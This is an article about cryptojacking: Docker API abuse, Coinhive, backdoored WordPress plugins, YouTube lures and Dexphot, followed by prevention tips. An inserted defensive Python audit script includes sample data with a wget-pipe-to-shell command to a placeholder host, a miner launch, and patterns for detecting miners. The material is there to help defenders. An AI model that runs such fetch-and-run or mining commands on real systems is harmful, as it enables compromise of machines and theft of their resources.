Cyber criminals are getting better and better at cryptojacking your devices


Cyber criminals are cryptojacking your devices, stealing computing power to mine cryptocurrencies, and they are getting very good at it. It has become one of the major cyber crimes of recent years. These hackers are looking for computing power to run crypto-mining software, most of the time for Monero. They search for a security weakness, install some software and reap the rewards. In this way they use the computing power of companies and ordinary individuals to generate Monero. But how does it work exactly?


Cyber criminals who cryptojack aren’t super hackers; they use existing vulnerabilities to their own benefit. Most of the time they use well-known exploits and search for poorly updated computers and servers. In other cases they hope that consumers are careless enough to click on a link or visit a certain website. It’s all about getting that little piece of software onto the other computer and getting it running.


American internet security firm Bad Packets discovered ‘opportunistic mass scanning activity’ against Docker servers on November 26th. This is an example of typical cryptojacking activity. Most of the time the hackers are just looking for a weakness in one of the APIs. As soon as a weakness is found, they start an Alpine Linux container. That container downloads and runs a script, and the script in turn installs XMRig, basic mining software for Monero.

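As an added illustration of the Docker chain described above (not code from the original article), here is a small defensive audit that flags the two signals in that chain: a Docker daemon API listening on plain TCP, and a container that pipes a download into a shell or runs a miner binary. The daemon config, container records, URLs and pool name are constructed placeholders.

```python
import json
import re

# Constructed sample input (not a real host): a Docker daemon.json and the
# JSON that `docker inspect` prints for three containers.
DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "tls": False,
})
INSPECT_JSON = json.dumps([
    {"Name": "/web", "Config": {"Image": "nginx:1.19",
                                "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Name": "/sleepy_hopper", "Config": {"Image": "alpine:latest",
        "Cmd": ["sh", "-c", "wget -qO- http://EXAMPLE-PLACEHOLDER/x.sh | sh"]}},
    {"Name": "/miner", "Config": {"Image": "alpine:3.10",
        "Cmd": ["/tmp/xmrig", "-o", "pool.EXAMPLE-PLACEHOLDER:3333"]}},
])

# Strings a miner launch typically carries (hypothetical, minimal list).
MINER_PATTERNS = [re.compile(p, re.I) for p in
                  (r"\bxmrig\b", r"stratum\+tcp://", r"\bminerd\b")]
# A download piped straight into a shell: the "run a script" step.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I)


def audit_daemon(config_text):
    """Return findings for daemon listeners reachable over plain TCP."""
    cfg = json.loads(config_text)
    findings = []
    for host in cfg.get("hosts", []):
        if host.startswith("tcp://") and not cfg.get("tls", False):
            findings.append(f"daemon API exposed without TLS on {host}")
    return findings


def audit_containers(inspect_text):
    """Flag containers that pipe a download into a shell or run a miner."""
    findings = []
    for c in json.loads(inspect_text):
        name = c["Name"].lstrip("/")
        cmd = " ".join(c["Config"].get("Cmd") or [])
        if PIPE_TO_SHELL.search(cmd):
            findings.append(f"{name}: downloads and runs a script ({cmd})")
        if any(p.search(cmd) for p in MINER_PATTERNS):
            findings.append(f"{name}: command names a known miner ({cmd})")
    return findings


if __name__ == "__main__":
    for line in audit_daemon(DAEMON_JSON) + audit_containers(INSPECT_JSON):
        print(line)
```

On a real host the same functions can be fed `/etc/docker/daemon.json` and the output of `docker inspect $(docker ps -q)`.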

Coinhive was a founding father

Docker servers are enterprise solutions, and it’s not very likely that ordinary individuals run them at home. That doesn’t mean that you and I are safe though. Cryptojacking happens in all kinds of ways, and to the hackers it doesn’t matter whether they target commercial companies or individuals. Therefore it’s very important to be aware of the ways cryptojacking can happen.


The whole hype about cryptojacking started with Coinhive. This website plugin would use the computing power of the website’s visitors to mine for Monero. The service launched in 2017 as a way for website owners to generate some money, but quickly became the center of internet drama.


Websites used the software without telling their visitors, which caused a first backlash. On top of that there were, of course, hackers who injected the JavaScript code into websites without the owners knowing about it. At its peak Coinhive accounted for approximately 62 percent of all cryptojacking activity. Increased mining difficulty, blockchain forks, and the downturn of the crypto market made them decide to cease operations in March 2019. That didn’t mean that cryptojacking would stop; cyber criminals just got a lot more sophisticated.


Next level crypto crime

Installing a plugin on your website is a simple way to use other people’s computing resources. Cryptojacking is on the rise and it’s not very likely to stop any time soon. In 2018 the amount of crypto-mining malware increased by 4467 percent. This number was obviously driven by Coinhive, but it wasn’t the only source. In the first quarter of 2019 the number of ransomware attacks grew by 188 percent, while crypto mining grew another 29 percent.


A website security company reported in October 2019 that hackers were using vulnerabilities in old WordPress plugins. In addition they would create copies of popular plugins to trick users. When such a plugin is installed, it runs an executable that gives the hackers access to the server. Even when the plugin is removed, the hacker still has access. As a result he can use the web server to mine Monero. In similar fashion hackers are hiding code inside .WAV audio files, which is executed when the file is played.


McAfee Labs reported that cyber crime is becoming a lot more sophisticated. Hackers are searching for vulnerabilities, and any internet device with computing power will do. Last year malware targeting Internet-of-Things (IoT) devices grew by 200 percent. These internet-connected devices, like routers and IP cameras, don’t generate a lot of mining power individually, but it’s volume that the hackers are after. Power is in the numbers.


Cryptojacking is in the numbers

Slovakian software security firm Eset has uncovered that the cyber criminals behind the Statinko botnet are now deploying cryptocurrency mining software. To do this they target YouTube and its 2 billion monthly users. They upload videos that resonate well with certain audiences and provide links to entice viewers. Upon clicking, software can be installed on the viewer’s computer.


The hackers behind Statinko aim for users from Russia, Ukraine, Belarus and Kazakhstan. But by moving their criminal activity to YouTube, they could be looking to expand. According to Eset, 500 thousand devices have already been infected by the mining software. Reportedly YouTube is already removing content and channels that contain traces of Statinko’s code. But it’s unlikely that Statinko will stop, and therefore it’s important for users not to click any links from unknown sources.


Next level cryptojacking malware

The way the cyber criminals spread their cryptojacking malware on YouTube is similar to other hacking campaigns. It’s all about tricking the consumer into clicking and thereby activating certain software. However, sometimes things can get very complicated. On November 26th Microsoft reported on cryptojacking malware called Dexphot. This malware has infected 80 thousand computers worldwide since October 2018.


If someone has XMRig running on their computer, it’s quite easy to deactivate it. The Dexphot attack, however, is much more sophisticated and would even reinstall itself when defenders tried to remove the malware. This cryptojacking malware used all kinds of tactics to evade security software, using several different entry points.


Dexphot even received regular updates, underlining its ability to evolve over time into an ever-changing threat. This is next level malware, and it underlines how important it is to stay safe on the web.


How to prevent cryptojacking

Is your computer becoming slow, or is your processor working overtime? Sounds like your computer might be mining Monero for somebody. Perhaps it’s a good idea to install some quality internet security software. To prevent cryptojacking, live by these golden rules:


  • Never click on shady links and websites.
  • Never open e-mails and their attachments from unknown sources.
  • Install ad-blocking browser extensions, or just use Brave.
  • Keep your software, browser extensions, and mobile apps up to date.
  • And if you run a business, keep your APIs closed, and educate your employees!

Originally published at NEDEROB.


Translated from: https://medium.com/swlh/cyber-criminals-getting-good-at-cryptojacking-your-devices-62407fa5f6a0
